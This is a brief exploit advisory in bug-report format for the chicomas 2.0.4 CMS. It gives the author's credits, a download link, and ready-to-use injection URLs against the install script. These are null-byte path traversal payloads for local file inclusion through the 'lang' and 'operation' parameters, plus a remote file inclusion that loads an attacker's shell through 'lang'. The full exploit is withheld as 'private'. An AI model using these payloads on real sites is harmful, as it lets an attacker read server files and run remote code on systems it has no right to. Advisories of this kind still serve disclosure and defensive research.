bug report
# Author: Hadi Kiamarsi
# Exploit By : Hadi Kiamarsi
# Email : hadikiamarsi@xxxxxxxxxxx
# CMS: chicomas.2.0.4
# Download CMS :
http://garr.dl.sourceforge.net/sourceforge/chicomas/chicomas.2.0.4.zip
web site : http://ircrash.com
##############################################################################
File Inclusion ( Local & Remote )
# Bugs :
#Local File Inclusion:
[chicomas]/install/?lang=../FILE%00
[chikomas]/install/?operation=../FILE%00
#Remote File Inclusion
[chicomas]/install/?lang=[SHELL]%00
#Exploit
exploit is very private